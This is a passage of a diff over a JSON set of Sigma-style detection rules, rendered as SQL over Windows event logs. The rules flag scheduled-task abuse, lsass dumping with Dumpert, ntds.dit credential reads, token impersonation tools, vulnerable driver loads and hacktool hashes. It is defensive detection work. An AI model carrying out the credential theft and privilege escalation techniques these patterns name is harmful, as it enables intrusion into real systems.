Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR 
(CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_clipboard.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Clear PowerShell History - PowerShell Module", - "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Very unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE 
'%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_clear_powershell_history.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", - "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "title": "Dism Remove Online Package", + "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_zip_compress.yml" + "filename": "proc_creation_win_dsim_remove.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - "status": "test", - "description": "Detects suspicious invocation of the 
Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", + "id": "435e10e4-992a-4281-96f3-38b11106adde", + "status": "experimental", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Root Certificate Installed From Susp 
Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Process Hacker and System Informer Driver Load", - "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "title": "HackTool - Impersonate Execution", + "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "status": "experimental", - "description": "Detects the load of drivers used by Process Hacker and System Informer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the Impersonate 
tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis", "tags": [ "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' 
ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = 
'0A358FFC1697B7A07D0E817AC740DF62')))" ], - "filename": "driver_load_win_process_hacker.yml" + "filename": "proc_creation_win_hktl_impersonate.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects the 
load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", "status": "test", - "description": "Detects 
powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Vulnerable Driver Load By Name", - "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", - "status": "experimental", - "description": "Detects the load of known vulnerable drivers via their names only.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. 
So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", - "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" + "Legitimate use of one of these tools" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ADV64DRV.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ALSysIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrAutoChkUpdDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv101.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrIbDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrOmgDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrRapidStartDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrSmartConnectDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_AMD64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_IA64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GLCKIO2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HOSTNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwRwDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mhyprot2.sys' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenLibSys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SysInfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VProEventMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WCPU.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WINIODrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp152.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswsnx.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandbox.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DBUtilDrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_RCIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneTechIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NalDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE 
